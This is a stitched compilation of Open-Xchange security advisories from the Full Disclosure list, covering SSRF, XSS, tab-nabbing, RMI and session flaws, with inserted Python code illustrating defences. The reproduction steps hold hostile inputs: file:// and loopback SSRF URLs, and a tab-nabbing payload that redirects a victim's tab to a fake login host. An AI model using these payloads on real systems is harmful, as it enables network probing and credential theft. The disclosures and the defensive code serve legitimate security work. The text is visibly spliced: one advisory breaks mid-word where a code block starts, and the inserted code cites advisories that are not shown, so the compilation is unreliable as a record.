E-Mail attachments that should be added. This reference was not checked against 
a sufficient protocol and host blacklist.

Risk:
Users can trigger API calls that invoke local files or URLs. Content provided 
by these resources would be added as attachment.

Steps to reproduce:
1. Create a task
2. Use the /ajax/attachment?action=attach API call and provide a URL
"datasource": {
"identifier": "com.openexchange.url.mail.attachment",
"url": "file:///var/file"
}

Solution:
We have implemented a protocol and host blacklist to avoid invoking any 
file-system references and local addresses.



---



Internal reference: 67874 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev49, 7.8.4-rev66, 7.10.1-rev25, 7.10.2-rev19
Vendor notification: 2019-10-31
Solution date: 2019-12-09
Public disclosure: 2020-02-19
Researcher Credits: chbi
CVE reference: CVE-2019-18846
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
The RSS feature allows adding arbitrary data sources. To avoid exposing 
confidential data we implemented a host blacklist and protocol whitelist. Due 
to an error the host blacklist was not checked in case the protocol passed the 
whitelist.

Risk:
Users can trigger API calls that invoke local URLs; if a host can be accessed, a 
different error will be returned compared to unavailable hosts. This can be 
used to discover an internal network topology and services.

Steps to reproduce:
1. Create an RSS feed
2. Use http://127.0.0.1.nip.io:80/test.xml as RSS feed
3. Monitor the response code

Solution:
We fixed the blacklist evaluation and avoid access to blacklisted hosts 
regardless of the port evaluation. Please consider adjusting 
com.openexchange.messaging.rss.feed.blacklist to your network layout.
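The SSRF entries in these advisories describe the same mistake from several angles: a host blacklist skipped once the protocol passed the whitelist (this entry), a file:// data source (bug 67871), redirects pointing at 127.0.0.1 (GUARD-182), and a blacklist check performed separately from the real request so that a "smart" endpoint can pass the check and redirect on the retrieval (bug 68441). The following Python is an added illustration of a guard that closes all of these, not Open-Xchange code; the host names, the address 93.184.216.34 standing in for a public host, and the smart endpoint are constructed, and DNS and HTTP are replaced by injected callables so it runs offline.

```python
"""SSRF guard for user-supplied URLs (added illustration, not OX App Suite code).
Scheme allowlist and host blocklist are both evaluated, unconditionally, right
before every request including each redirect hop, so a "smart" endpoint that
answers harmlessly to a separate probe (bug 68441) gains nothing. All data is constructed."""
import ipaddress
from urllib.parse import urljoin, urlparse

ALLOWED_SCHEMES = {"http", "https"}          # file:// and other schemes never pass
REDIRECT_CODES = {301, 302, 303, 307, 308}
MAX_REDIRECTS = 5

class BlockedUrl(Exception):
    """Raised when a URL (or a redirect target) must not be fetched."""

def is_blocked_ip(addr):
    """Loopback, RFC 1918/ULA, link-local, multicast, reserved or unspecified."""
    ip = ipaddress.ip_address(addr)
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def check_url(url, resolve):
    """Both checks, every time. resolve(host) -> list of IP strings; resolving
    is what catches names such as 127.0.0.1.nip.io that point at loopback."""
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        raise BlockedUrl(f"scheme not allowed: {parsed.scheme!r}")
    host = parsed.hostname
    if not host:
        raise BlockedUrl("missing host")
    try:                                     # literal address: no lookup needed
        addrs = [str(ipaddress.ip_address(host))]
    except ValueError:
        addrs = resolve(host)
    if not addrs:
        raise BlockedUrl(f"unresolvable host: {host}")
    for addr in addrs:                       # every record must be acceptable
        if is_blocked_ip(addr):
            raise BlockedUrl(f"{host} resolves to blocked address {addr}")

def outcome(fn, *args):
    """Run fn(*args); return its result, or the reason it was blocked."""
    try:
        return fn(*args)
    except BlockedUrl as exc:
        return f"blocked: {exc}"

def vulnerable_fetch(url, resolve, fetch):
    """Pre-fix shape (68441): a probe validates the URL and whatever redirect
    chain it sees; a second, unchecked request then retrieves the resource."""
    probe = url
    for _ in range(MAX_REDIRECTS + 1):
        check_url(probe, resolve)
        status, location, _ = fetch(probe)
        if status not in REDIRECT_CODES or not location:
            break
        probe = urljoin(probe, location)
    for _ in range(MAX_REDIRECTS + 1):       # real retrieval, no checks at all
        status, location, body = fetch(url)
        if status not in REDIRECT_CODES or not location:
            return url, body
        url = urljoin(url, location)
    raise BlockedUrl("too many redirects")

def safe_fetch(url, resolve, fetch):
    """Fixed shape: the request that is checked is the request that is made,
    and every redirect target is checked before it is followed."""
    for _ in range(MAX_REDIRECTS + 1):
        check_url(url, resolve)
        status, location, body = fetch(url)
        if status not in REDIRECT_CODES or not location:
            return url, body
        url = urljoin(url, location)
    raise BlockedUrl("too many redirects")

# Constructed test doubles, no real network.
FAKE_DNS = {"feeds.example.org": ["93.184.216.34"],   # stand-in public host
            "127.0.0.1.nip.io": ["127.0.0.1"],        # name from the RSS advisory
            "localhost": ["127.0.0.1"]}

def fake_resolve(host):
    return FAKE_DNS.get(host, [])

class SmartEndpoint:
    """Constructed responder for feeds.example.org: serves a harmless feed until
    request number `redirect_from_call`, then redirects to a loopback service."""
    def __init__(self, redirect_from_call=2):
        self.calls, self.redirect_from_call = 0, redirect_from_call

    def __call__(self, url):
        self.calls += 1
        if url.startswith("http://127.0.0.1:22/"):
            return 200, None, "SSH-2.0-constructed-banner"
        if self.calls < self.redirect_from_call:
            return 200, None, "<rss/>"
        return 302, "http://127.0.0.1:22/", ""

def demo():
    """Where each fetcher ends up against the constructed endpoints."""
    feed = "http://feeds.example.org/feed.xml"
    return {"vulnerable_smart": outcome(vulnerable_fetch, feed, fake_resolve, SmartEndpoint(2)),
            "safe_smart": outcome(safe_fetch, feed, fake_resolve, SmartEndpoint(2)),
            "safe_redirect": outcome(safe_fetch, feed, fake_resolve, SmartEndpoint(1))}
```

Against the smart endpoint the pre-fix flow ends up reading the loopback service while the fixed flow only ever receives the harmless feed; an endpoint that redirects straight away is blocked before the redirect target is contacted.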



---



Internal reference: 67931, 68258 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev66, 7.10.1-rev25, 7.10.2-rev19
Vendor notification: 2019-11-04
Solution date: 2019-12-09
Public disclosure: 2020-02-19
CVE reference: CVE-2019-18846
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
The snippets API allows adding arbitrary data sources. This reference was not 
checked against a sufficient protocol and host blacklist.

Risk:
Users can trigger API calls that invoke local URLs. If a host can be accessed, a 
different error will be returned compared to unavailable hosts. This can be 
used to discover an internal network topology, services and files.

Steps to reproduce:
1. Create a snippet with HTML content
2. Include a reference to an internal host/service
http://localhost:22/badboy;>
3. Monitor the response code

Solution:
We implemented a protocol and host blacklist to avoid invoking any file-system 
references and local addresses.



---



Internal reference: 67980 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev49, 7.8.4-rev66, 7.10.1-rev25, 7.10.2-rev19
Vendor notification: 2019-11-05
Solution date: 2019-12-09
Public disclosure: 2020-02-19
CVE reference: CVE-2019-18846
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
The mail accounts feature allows adding arbitrary data sources. To avoid 
exposing confidential data we implemented a host blacklist and protocol 
whitelist. Due to an error the host blacklist was not checked in case the 
protocol passed the whitelist.

Risk:
Users can trigger API calls that invoke local URLs. If a host can be accessed, a 
different error will be returned compared to unavailable hos
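Below is an added example, in Python, of the protocol whitelist plus host blacklist check that the SSRF entries in this advisory describe; it is not Open-Xchange code. The blacklist contents, the host names and the stub resolver are constructed, and the resolver stands in for real DNS so the code runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

# Only these schemes may be fetched on a user's behalf; file:// and friends are out.
ALLOWED_SCHEMES = {"http", "https"}

# Constructed host blacklist. A deployment would derive it from its own network
# layout (the advisory points at com.openexchange.messaging.rss.feed.blacklist).
HOST_BLACKLIST = {"localhost", "127.0.0.1", "::1", "0.0.0.0", "169.254.169.254"}

# Constructed stand-in for DNS so the example runs offline. Wildcard DNS services
# map a name like 127.0.0.1.nip.io to 127.0.0.1, so a name-only blacklist is
# bypassed unless the resolved addresses are classified as well.
FAKE_DNS = {
    "feeds.example.com": ["93.184.216.34"],
    "127.0.0.1.nip.io": ["127.0.0.1"],
    "intranet.corp.example": ["10.0.0.5"],
}


def _ip_is_internal(ip: str) -> bool:
    """True for loopback, RFC 1918, link-local, multicast, reserved or unspecified."""
    addr = ipaddress.ip_address(ip)  # raises ValueError if ip is not an IP literal
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def scheme_allowed(url: str) -> bool:
    """Protocol whitelist."""
    return urlsplit(url).scheme.lower() in ALLOWED_SCHEMES


def host_allowed(url: str, resolve=lambda name: FAKE_DNS.get(name, [])) -> bool:
    """Host blacklist. The port is deliberately ignored: whether the destination
    is internal does not depend on it."""
    host = urlsplit(url).hostname  # lower-cased, brackets and port stripped
    if not host:
        return False  # no authority at all (e.g. file:///var/file)
    if host in HOST_BLACKLIST:
        return False
    try:
        return not _ip_is_internal(host)  # IP literal: classify it directly
    except ValueError:
        pass  # a host name (shorthand forms such as 127.1 also end up here)
    addrs = resolve(host)
    if not addrs:
        return False  # unresolvable: fail closed rather than let the fetch try
    return not any(_ip_is_internal(a) for a in addrs)


def check_before_fetch(url: str) -> bool:
    """Both checks must pass. A permitted scheme never short-circuits the host
    check, which is the evaluation-order bug the RSS entry describes."""
    return scheme_allowed(url) and host_allowed(url)
```

A check of this shape has to be repeated on every redirect hop, and its rejection should surface as the same generic error as a failed fetch, so that reachable and unreachable internal hosts cannot be told apart by the response, which is the leak the Risk sections above point out.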

[FD] Open-Xchange Security Advisory 2020-01-02

2020-01-03 Thread Open-Xchange GmbH via Fulldisclosure
Dear subscribers,

we're sharing our latest advisory with you and would like to thank everyone who 
contributed in finding and solving those vulnerabilities. Feel free to join our 
bug bounty programs (open-xchange, appsuite, dovecot, powerdns) at HackerOne.

Yours sincerely,
Martin Heiland, Open-Xchange GmbH



Product: OX App Suite
Vendor: OX Software GmbH



Internal reference: 67097 (Bug ID)
Vulnerability type: Cross-site scripting (CWE-80)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.2-rev14, 7.10.1-rev22, 7.8.4-rev64
Vendor notification: 2019-09-20
Solution date: 2019-10-18
Public disclosure: 2020-01-02
CVE reference: CVE-2019-16717
CVSS: 3.1 (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
PNG files can be altered to contain comments, which might be script code. When 
sending such a PNG file as E-Mail and modifying the multipart content 
information, it's possible to inject script code in case the recipient gets 
tricked into using a specific URL.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (sending 
mail, deleting data etc.). To exploit this an additional step is necessary 
which could be achieved through social engineering.

Steps to reproduce:
1. Create a PNG file with JS code as comment
2. Create a mail with that file as inline image
3. Modify the image's multipart information (filename to "something.html", 
content-type to "image/svg")
4. Send the mail to the victim
5. Make the victim click a hyperlink that requests the multipart image from the 
specific mail (would require guessing/evaluating the mail ID)

Solution:
We dismiss modifications to filename and content-type when returning multipart 
content of mails as download.


---


Internal reference: 66594 (Bug ID)
Vulnerability type: Cross-site scripting (CWE-80)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.2-rev13, 7.10.1-rev21, 7.8.4-rev58
Vendor notification: 2019-08-16
Solution date: 2019-10-18
Public disclosure: 2020-01-02
CVE reference: CVE-2019-16717
CVSS: 2.2 (CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
When editing a mail signature's "Source", pasting malformed script code would 
bypass local sanitization.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (sending 
mail, deleting data etc.). To exploit this an additional step is necessary 
which could be achieved through social engineering.

Steps to reproduce:
1. Edit an HTML E-Mail signature
2. Paste a double-tagged piece of script code

Proof of concept:


Solution:
We now use DOMPurify at this location as well.


---


Internal reference: 66538 (Bug ID)
Vulnerability type: Improper access control (CWE-284)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.2-rev14, 7.10.1-rev22, 7.8.4-rev64
Vendor notification: 2019-08-13
Solution date: 2019-10-18
Public disclosure: 2020-01-02
CVE reference: CVE-2019-16716
CVSS: 2.2 (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N)

Vulnerability Details:
Under certain conditions the RMI default configuration could flip to unexpected 
values, allowing to invoke classes outside of the own codebase.

Risk:
In case the attacker is able to issue RMI provisioning commands, this could be 
used to load malicious classes into the middleware's Java process. As a result 
malicious code could be executed on the server side. This requires breaching 
several levels of security measures and elevated permissions on the target 
system.

Steps to reproduce:
1. Can be best reproduced with Metasploit's "java_rmi_server" script.

Solution:
We make sure that "java.rmi.server.useCodebaseOnly" is always "true" when 
initializing the RMI implementation.



signature.asc
Description: Message signed with OpenPGP

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Open-Xchange Security Advisory 2019-08-15

2019-08-16 Thread Open-Xchange GmbH via Fulldisclosure
Dear subscribers,

we're sharing our latest advisory with you and would like to thank everyone who 
contributed in finding and solving those vulnerabilities. Feel free to join our 
bug bounty programs (appsuite, dovecot, powerdns) at HackerOne.

Yours sincerely,
Martin Heiland, Open-Xchange GmbH



Product: OX Guard
Vendor: OX Software GmbH

Internal reference: 65132 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev48, 7.8.4-rev59, 7.10.0-rev32, 7.10.1-rev14, 7.10.2-rev5
Vendor notification: 2019-05-09
Solution date: 2019-06-13
Public disclosure: 2019-08-15
CVE reference: CVE-2018-9997
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

Vulnerability Details:
Curly brackets can be used to bypass XSS sanitization in HTML mail and other 
HTML attachments. A variation of the original issue has been found that's based 
on incorrect global event handler blacklist entries.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (sending 
mail, deleting data etc.).

Steps to reproduce:
1. Create an HTML mail with curly brackets that disguise event handlers in CSS
2. Make an App Suite user open the malicious mail

Proof of concept:


Solution:
We updated the list of blacklisted event handlers to close this bypass, 
operators may add a workaround by updating "globaleventhandlers.list" and 
change the incorrect handler "onmounseleave" to "onmouseleave".


---


Internal reference: 64992 (Bug ID)
Vulnerability type: Data validation fault (CWE-34)
Vulnerable version: 7.10.1 and earlier, 2.10.2 and earlier
Vulnerable component: guard, backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version (guard): 2.8.0-rev22, 2.10.1-rev7
Fixed version (backend): 7.8.4-rev59, 7.10.1-rev14
Vendor notification: 2019-05-03
Solution date: 2019-06-13
Public disclosure: 2019-08-15
Researcher Credits: Jens Müller, Marcus Brinkmann, Damian Poddebniak, Hanno 
Böck, Sebastian Schinzel, Juraj Somorovsky, and Jörg Schwenk
CVE reference: CVE-2019-11521
CVSS: 5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

Vulnerability Details:
Internal evaluation revealed that OX Guard is vulnerable to a subset of 
techniques used to display a valid signature from the identity of a trusted 
communication partner located in the mail header, although the crafted email is 
actually signed by an attacker. Our discoveries are based on work of a team of 
researchers, publishing these spoofing techniques under the "Johnny You Are 
Fired" project name.

Risk:
Recipients of signed PGP mail could be fooled to assume the mail originates 
from a trusted source rather than an attacker. This would elevate the mail's 
trust level and potentially ease social-engineering attacks.

Steps to reproduce:
1. Create mails that contain valid signatures but originate from a different 
source

Proof of concept:
https://github.com/RUB-NDS/Johnny-You-Are-Fired/tree/master/04-id

Solution:
We improved validation and make sure mail with valid signatures is only 
evaluated to be "trusted" if the sender matches the signature issuer. We also 
extended our API to provide more information about a specific signature to let 
clients add checks and handle invalid signature information.



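As an added illustration of the sender-must-match-signer rule in the OX Guard solution above (example code, not OX Guard's implementation), the following Python compares only the mailbox part of the From header with the mailbox part of each signer user ID, so that a trusted address smuggled into the display-name part of either one is never matched. The sample headers and user IDs are constructed.

```python
from email.utils import getaddresses, parseaddr


def uid_address(uid: str) -> str:
    """Mailbox (addr-spec) of a PGP user ID such as 'Alice <alice@example.com>',
    lower-cased. Text in the name part is deliberately never matched."""
    _, addr = parseaddr(uid)
    return addr.lower()


def evaluate_signature(from_header: str, signer_uids, signature_valid: bool):
    """Classify a signed mail.

    Returns ("invalid", None)      if the cryptographic check failed,
            ("trusted", address)   if it passed and the mailbox of one signer
                                   user ID equals the single From mailbox,
            ("untrusted", None)    otherwise: valid signature, wrong identity.
    """
    if not signature_valid:
        return ("invalid", None)
    mailboxes = [addr.lower() for _, addr in getaddresses([from_header]) if addr]
    if len(mailboxes) != 1:
        return ("untrusted", None)  # empty or multiple From mailboxes: refuse to guess
    sender = mailboxes[0]
    for uid in signer_uids:
        candidate = uid_address(uid)
        if candidate and candidate == sender:
            return ("trusted", sender)
    return ("untrusted", None)


# Constructed samples
GENUINE_FROM = "Alice <alice@example.com>"
GENUINE_UIDS = ["Alice <alice@example.com>"]
# An attacker-controlled key whose user ID carries the trusted address in its
# *name* part; a substring match on the user ID string would accept it.
SPOOFED_UIDS = ['"alice@example.com" <mallory@evil.example>']
```

The three-way result is what a client needs to render the distinct states the extended API is meant to expose: a valid signature from the wrong identity must look different from both "invalid" and "trusted".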

[FD] Open-Xchange Security Advisory 2019-08-15

2019-08-16 Thread Open-Xchange GmbH via Fulldisclosure
Dear subscribers,

we're sharing our latest advisory with you and would like to thank everyone who 
contributed in finding and solving those vulnerabilities. Feel free to join our 
bug bounty programs (appsuite, dovecot, powerdns) at HackerOne.

Yours sincerely,
Martin Heiland, Open-Xchange GmbH



Product: OX App Suite
Vendor: OX Software GmbH

Internal reference: 64680 (Bug ID)
Vulnerability type: Content Spoofing (CWE-451)
Vulnerable version: 7.10.1
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.1-rev12
Vendor notification: 2019-04-15
Solution date: 2019-05-09
Public disclosure: 2019-08-15
Researcher Credits: zee_shan
CVE reference: CVE-2019-11521
CVSS: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)

Vulnerability Details:
Appointment titles are rendered as hyperlink but were missing a protection 
against "tab nabbing".

Risk:
When following a hyperlink to a malicious website, the original tab location 
(OX App Suite) could be replaced with a URL chosen by the attacker. This can be 
exploited to trick users to re-enter credentials to a seemingly legitimate 
website and as a result take over accounts.

Steps to reproduce:
1. Create an appointment invitation that contains a link to a malicious website 
including a blank "target" attribute
2. Make the user accept the invitation and click the hyperlink at the 
appointment's title
3. Provide an effective exploit to overwrite the user's original URL and fake a 
login page

Proof of concept:
Appointment title content:
Click Me! :-)

Payload:

window.opener.location.replace('//www.evil-fakelogin.com/');



Solution:
We extended the usage of existing protection mechanisms (blankshield) to this 
case.


---


Internal reference: 64682 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.0 and 7.10.1
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.0-rev31, 7.10.1-rev12
Vendor notification: 2019-04-15
Solution date: 2019-05-13
Public disclosure: 2019-08-15
Researcher Credits: zee_shan
CVE reference: CVE-2019-11522
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

Vulnerability Details:
When replying to an HTML E-Mail with specific payload, that payload could be 
executed as script code. The user would have to have HTML composing enabled to 
exploit this vulnerability. This vulnerability could happen as browsers 
incorrectly "fix" HTML content as demonstrated by @kinugawamasato for Google 
Search.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (sending 
mail, deleting data etc.).

Steps to reproduce:
1. Create an E-Mail with malicious content and deliver it to the user
2. Make the user "reply" to the E-Mail

Proof of concept:
Test
Another XSS!
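An added example, in Python, of how a renderer can turn user-supplied text such as an appointment title into a hyperlink without the tab-nabbing exposure described in the first entry of this post; this is not App Suite's blankshield code, and the scheme allow-list is an assumption. The point is that `target="_blank"` is never emitted without `rel="noopener"`, which leaves the opened page with a null `window.opener` and so nothing to call `location.replace` on.

```python
from html import escape
from urllib.parse import urlsplit

# Assumed allow-list of link schemes a title may point at.
SAFE_LINK_SCHEMES = {"http", "https", "mailto"}


def safe_href(url: str):
    """Return the URL if its scheme is allowed, else None.
    Relative URLs carry no scheme and pass; javascript: and data: do not."""
    candidate = url.strip()
    scheme = urlsplit(candidate).scheme.lower()
    if scheme and scheme not in SAFE_LINK_SCHEMES:
        return None
    return candidate


def render_link(url: str, label: str) -> str:
    """Build an anchor from untrusted url/label.

    - label and href are HTML-escaped, so markup inside the title stays text
    - target="_blank" always travels with rel="noopener noreferrer"
    - a rejected scheme degrades to the escaped label with no link at all
    """
    href = safe_href(url)
    if href is None:
        return escape(label)
    return ('<a href="%s" target="_blank" rel="noopener noreferrer">%s</a>'
            % (escape(href, quote=True), escape(label)))
```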

[FD] Open-Xchange Security Advisory 2019-04-01

2019-04-04 Thread Open-Xchange GmbH via Fulldisclosure
Dear subscribers,

we're sharing our latest advisory with you and would like to thank everyone who 
contributed in finding and solving those vulnerabilities. Feel free to join our 
bug bounty programs (appsuite, dovecot, powerdns) at HackerOne.

Yours sincerely,
  Martin Heiland, Open-Xchange GmbH


Product: OX App Suite
Vendor: OX Software GmbH

Internal reference: 61771 (Bug ID)
Vulnerability type: Information Exposure (CWE-200)
Vulnerable version: 7.10.1 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed Version: 7.6.3-rev44, 7.8.3-rev53, 7.8.4-rev51, 7.10.0-rev25, 7.10.1-rev7
Vendor notification: 2018-11-23
Solution date: 2019-02-13
Public disclosure: 2019-04-01
CVE reference: CVE-2019-7159
CVSS: 4.1 (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N)

Vulnerability Details:
The "oxsysreport" tool failed to sanitize custom configuration parameters that 
could contain credentials like API keys.

Risk:
Unintended configuration information has been collected and potentially sent to 
OX for further analysis. This transmission would happen through secure channels 
and to authorized personnel. We have no indication that data was used 
illegitimately.

Steps to reproduce:
1. Have configuration properties that don't match the expected format (e.g. 
commented out, custom key format)
2. Run oxsysreport and check what parameters have been sanitized

Solution:
We made sure to remove all incorrectly collected information and removed 
backups thereof. To solve the root cause, the oxsysreport tool has been updated 
to deal with other patterns of properties.


---


Internal reference: 61315 (Bug ID)
Vulnerability type: Improper Access Control (CWE-284)
Vulnerable version: 7.10.1 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed Version: 7.8.3-rev53, 7.8.4-rev51, 7.10.0-rev25, 7.10.1-rev7
Vendor notification: 2018-11-06
Solution date: 2019-02-13
Public disclosure: 2019-04-01
CVE reference: CVE-2019-7158
CVSS: 4.2 (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N)

Vulnerability Details:
In case users did choose not to "stay signed in" or the operator disabled that 
functionality, cookies are maintained for a "session" lifetime to make sure 
they expire after the browser session has ended. Using "reload" on the existing 
browser session led to the impression that the session is already terminated as 
the login screen would be shown afterwards. However, those cookies are 
maintained by the browser for the remainder of the session until termination of 
the browser tab or window.

Risk:
Users could get the incorrect impression that their session has been terminated 
after reloading the browser window. In fact, the credentials for authentication 
(cookies) were maintained and other users with physical access to the browser 
could re-use them to execute API calls and access other users' data.

Steps to reproduce:
1. Login with "Stay signed in" disabled
2. Reload the browser
3. Check which cookies are maintained while the "login" page is displayed

Solution:
We now drop the session associated with the existing secret cookie on the 
server side in case a new login is performed and thus a new secret cookie is 
about to be written.



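An added example (constructed, not OX code) of the server-side rule in the last solution above: a login that arrives while the browser still presents a secret cookie from an earlier session terminates the session bound to that cookie before a fresh secret is issued, so a stale cookie left behind after a "reload" can no longer be replayed against the API.

```python
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class SessionStore:
    """Server-side session registry keyed by the secret cookie value."""
    sessions: Dict[str, str] = field(default_factory=dict)  # secret -> user

    def login(self, user: str, presented_secret: Optional[str] = None) -> str:
        """Authenticate `user` and return the new secret to set as cookie.

        `presented_secret` is whatever secret cookie the browser still sent with
        the login request. If it names a live session, that session is dropped
        first: the browser is about to overwrite the cookie anyway, and leaving
        the old session valid is exactly what let a bystander reuse it.
        """
        if presented_secret is not None:
            self.sessions.pop(presented_secret, None)
        secret = secrets.token_urlsafe(32)
        self.sessions[secret] = user
        return secret

    def user_for(self, secret: str) -> Optional[str]:
        """Resolve a presented secret cookie to its user, or None if no session."""
        return self.sessions.get(secret)

    def logout(self, secret: str) -> None:
        self.sessions.pop(secret, None)
```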

[FD] Open-Xchange Security Advisory 2019-01-18

2019-01-18 Thread Open-Xchange GmbH
Dear subscribers,

we're sharing our latest advisory with you and would like to thank everyone who 
contributed in finding and solving those vulnerabilities. Feel free to join our 
bug bounty programs (open-xchange, dovecot, powerdns) at HackerOne.

Yours sincerely,
Martin Heiland, Open-Xchange GmbH




Product: OX App Suite
Vendor: OX Software GmbH

Internal reference: 59653 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.0
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.0-rev13
Vendor notification: 2018-07-31
Solution date: 2018-08-21
Public disclosure: 2019-01-18
Researcher Credits: Gamal negm eldin
CVE reference: CVE-2018-13104
CVSS: 5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

Vulnerability Details:
Attachment file names in mail can be used to inject script code, in case the 
victim uses "mouse over" on the attachment.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (sending 
mail, deleting data etc.).

Steps to reproduce:
1. Create a malicious multipart HTML E-Mail
2. Make the recipient expand the "attachments" area and mouse-over the 
attachment

Proof of concept:
--=_Part_361_1510656222.1533025735063
Content-Type: image/svg+xml; name="w"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="w"


Solution:
We made sure to use the actual text node as label to avoid injecting DOM nodes.


---


Internal reference: 59507 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.10.0 and earlier
Vulnerable component: frontend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.0-rev13, 7.8.4-rev40, 7.8.3-rev44, 7.6.3-rev34
Vendor notification: 2018-07-25
Solution date: 2018-08-16
Public disclosure: 2019-01-18
Researcher Credits: Zhihua Yao (chihuahua)
CVE reference: CVE-2018-13104
CVSS: 3.5 (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:
File names of attachments of PIM objects (appointments, contacts, tasks) can be 
used to inject script code. Sharing such objects with other users allows 
attacking them. This requires either a trust relationship between those users, 
or both have to be provisioned to the same context.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (sending 
mail, deleting data etc.).

Steps to reproduce:
1. Create a PIM object, like an appointment
2. Upload an attachment with a malicious file name
3. Make the victim open the object in detail view

Proof of concept:
">.jpg

Solution:
We transformed file names to text nodes before adding them to DOM.


---


Internal reference: 58742 (Bug ID)
Vulnerability type: Cross-Site Scripting (CWE-80)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev39, 7.8.3-rev50, 7.6.3-rev41
Vendor notification: 2018-05-24
Solution date: 2018-08-21
Public disclosure: 2019-01-18
Researcher Credits: Secator
CVE reference: CVE-2018-13104
CVSS: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

Vulnerability Details:
Specific URL parameters can be used to circumvent handling of potentially 
malicious files. Usually we force the user agent to download such files instead 
of eventually opening them.

Risk:
Malicious script code can be executed within a user's context. This can lead to 
session hijacking or triggering unwanted actions via the web interface (sending 
mail, deleting data etc.).

Steps to reproduce:
1. Create a malicious HTML file and upload it to Drive
2. Modify the file type to "application/xml" or "application/xhtml+xml" to 
trigger UA content guessing
3. Create a link to download that file and use the content_disposition=inline 
parameter
4. Share the link with some other user of the system, or a guest and make them 
open it

Proof of concept:
https://example.com/appsuite/api/files/html-xml?action=document=10=10%2F348_disposition=inline

Solution:
We now prefer server-side content-disposition defaults over client-side 
parameters when dealing with attachments.


---


Internal reference: 56457 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.8.4 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev39, 7.8.3-rev50, 7.6.3-rev41
Vendor notification: 2017-12-11
Solution date: 2018-08-21
Public disclosure: 2019-01-18
